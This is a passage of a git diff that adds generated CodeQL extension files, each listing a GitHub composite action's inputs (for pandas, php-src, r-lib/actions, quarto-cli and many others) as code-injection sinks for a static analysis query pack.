a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml new file mode 100644 index 000000000000..6e34a2cf5927 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_files_changed", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_labels_set", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.labeler_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.components_config_schema", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.components_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.component_pattern", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.ref_name", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.repository", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.commit_sha", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.pr", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.pip-cache-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml new file mode 100644 index 000000000000..4ea72b28476a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml new file mode 100644 index 000000000000..a0b7bca54ad2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml new file mode 100644 index 000000000000..816a18fe73b3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oppia/oppia", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml new file mode 100644 index 000000000000..bf8cbfc01e02 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oracle/graal", "*", "inputs.components", "code-injection", "generated"] + - ["oracle/graal", "*", "inputs.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml new file mode 100644 index 000000000000..bf88ed5c0a11 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oracle/truffleruby", "*", "inputs.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml new file mode 100644 index 000000000000..05c2a1cfaf67 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["orhun/git-cliff", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml new file mode 100644 index 000000000000..46a8fd4fb8b2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oven-sh/bun", "*", "inputs.download-url", "code-injection", "generated"] + - ["oven-sh/bun", "*", "inputs.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml new file mode 100644 index 000000000000..32467f8c3f20 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["owntracks/android", "*", "inputs.name", "code-injection", "generated"] + - ["owntracks/android", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml new file mode 100644 index 000000000000..3f4cc69ba75b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pandas-dev/pandas", "*", "inputs.meson_args", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "inputs.editable", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "inputs.cflags_adds", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml new file mode 100644 index 000000000000..8b8ebf88b468 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pardeike/harmony", "*", "inputs.architecture", "code-injection", "generated"] + - ["pardeike/harmony", "*", "inputs.build_configuration", "code-injection", "generated"] + - ["pardeike/harmony", "*", "inputs.target_framework_array", "code-injection", "generated"] + - ["pardeike/harmony", "*", "inputs.target_framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml new file mode 100644 index 000000000000..4bc0d5f660d5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pennylaneai/pennylane", "*", "inputs.requirements_file", "code-injection", "generated"] + - ["pennylaneai/pennylane", "*", "inputs.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml new file mode 100644 index 000000000000..5f38860c86dd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["phalcon/cphalcon", "*", "inputs.target-name", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.ext-path", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.pecl", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.arch", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.msvc", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.ts", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.php_version", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml new file mode 100644 index 000000000000..8b45d92a5e0e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["philosowaffle/peloton-to-garmin", "*", "inputs.framework", "code-injection", "generated"] + - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml new file mode 100644 index 000000000000..7767c6497806 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["php/php-src", "*", "inputs.jitType", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.runTestsParameters", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.token", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.configurationParameters", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.libmysql", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml new file mode 100644 index 000000000000..419909764b7d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["phpdocumentor/phpdocumentor", "*", "inputs.passphrase", "code-injection", "generated"] + - ["phpdocumentor/phpdocumentor", "*", "inputs.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml new file mode 100644 index 000000000000..6e2b5247f292 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pinecone-io/pinecone-python-client", "*", "inputs.googleapis_common_protos_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.protobuf_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.lz4_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.grpcio_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.pinecone_client_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml new file mode 100644 index 000000000000..d012a6f2fbb3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pixijs/pixijs", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml new file mode 100644 index 000000000000..aead619b40be --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["posthog/posthog", "*", "inputs.group", "code-injection", "generated"] + - ["posthog/posthog", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml new file mode 100644 index 000000000000..b82360205f74 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["primer/react", "*", "inputs.token", "code-injection", "generated"] + - ["primer/react", "*", "inputs.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml new file mode 100644 index 000000000000..e5fad4e5256e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["project-chip/connectedhomeip", "*", "inputs.with", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "inputs.action", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml new file mode 100644 index 000000000000..71f90682b1bb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["projectnessie/nessie", "*", "inputs.job-name", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "inputs.java-version", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "inputs.job-instance", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "inputs.job-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml new file mode 100644 index 000000000000..07421b98859a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["psf/black", "*", "inputs.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml new file mode 100644 index 000000000000..81fbb3ae9e43 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyca/cryptography", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml new file mode 100644 index 000000000000..9587351ce1d6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyg-team/pytorch/geometric", "*", "inputs.torchvision-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "inputs.cuda-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "inputs.torch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml new file mode 100644 index 000000000000..080835504a6b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["python-poetry/poetry", "*", "inputs.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml new file mode 100644 index 000000000000..86ce393fbc57 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["python/mypy", "*", "inputs.install_project_dependencies", "code-injection", "generated"] + - ["python/mypy", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml new file mode 100644 index 000000000000..182558589d78 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quarto-dev/quarto-cli", "*", "inputs.keychain-pw", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.keychain", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.certificate-file", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.certificate-value", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.working-dir", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.bucket", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.base-url", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.files", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.binary-name", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml new file mode 100644 index 000000000000..1839670baa2c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quay/clair", "*", "inputs.tag", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.repo", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.quay", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.duration", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.token", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml new file mode 100644 index 000000000000..203dabaa3b9f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quickwit-oss/quickwit", "*", "inputs.target", "code-injection", "generated"] + - ["quickwit-oss/quickwit", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml new file mode 100644 index 000000000000..7247d125324a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["r-lib/actions", "*", "inputs.lockfile-create-lib", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.dependencies", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.upgrade", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.pak-version", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.profile", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.install-pandoc", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.extra-packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.needs", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.error-on", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.build_args", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.args", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.check-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml new file mode 100644 index 000000000000..22c8a56deacb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["randombit/botan", "*", "inputs.target", "code-injection", "generated"] + - ["randombit/botan", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml new file mode 100644 index 000000000000..7476425a35f7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["raspberrypi/documentation", "*", "inputs.secondary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.destination", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.source", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.bastion_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.primary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.public_bastion_host_keys", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.private_ssh_key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml new file mode 100644 index 000000000000..3c96c1b159db --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ray-project/kuberay", "*", "inputs.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml new file mode 100644 index 000000000000..da9def79964b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["readthedocs/actions", "*", "inputs.single-version", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.platform", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.message-template", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.project-language", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.project-slug", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml new file mode 100644 index 000000000000..80c917396846 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reflex-dev/reflex", "*", "inputs.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml new file mode 100644 index 000000000000..2121bb23710b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["renovatebot/renovate", "*", "inputs.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml new file mode 100644 index 000000000000..f0acc3056726 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rethinkdb/rethinkdb", "*", "inputs.command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "inputs.install_command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "inputs.env_activate", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "inputs.default_python_driver_commit_hash", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml new file mode 100644 index 000000000000..f099314b16e4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["risc0/risc0", "*", "inputs.key", "code-injection", "generated"] + - ["risc0/risc0", "*", "inputs.components", "code-injection", "generated"] + - ["risc0/risc0", "*", "inputs.targets", "code-injection", "generated"] + - ["risc0/risc0", "*", "inputs.toolchain", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml new file mode 100644 index 000000000000..971cd92e3cd6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rocketchat/rocket.chat", "*", "inputs.build-containers", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "inputs.release", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "inputs.docker-tag", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "inputs.root-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml new file mode 100644 index 000000000000..42aba6b02dd2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rook/rook", "*", "inputs.use-tmate", "code-injection", "generated"] + - ["rook/rook", "*", "inputs.kubernetes-version", "code-injection", "generated"] + - ["rook/rook", "*", "inputs.additional-namespace", "code-injection", "generated"] + - ["rook/rook", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml new file mode 100644 index 000000000000..71d71f6cb21d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["roots/trellis", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml new file mode 100644 index 000000000000..60a29d3edf7e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/debug", "*", "inputs.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml new file mode 100644 index 000000000000..84d174e5a050 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + 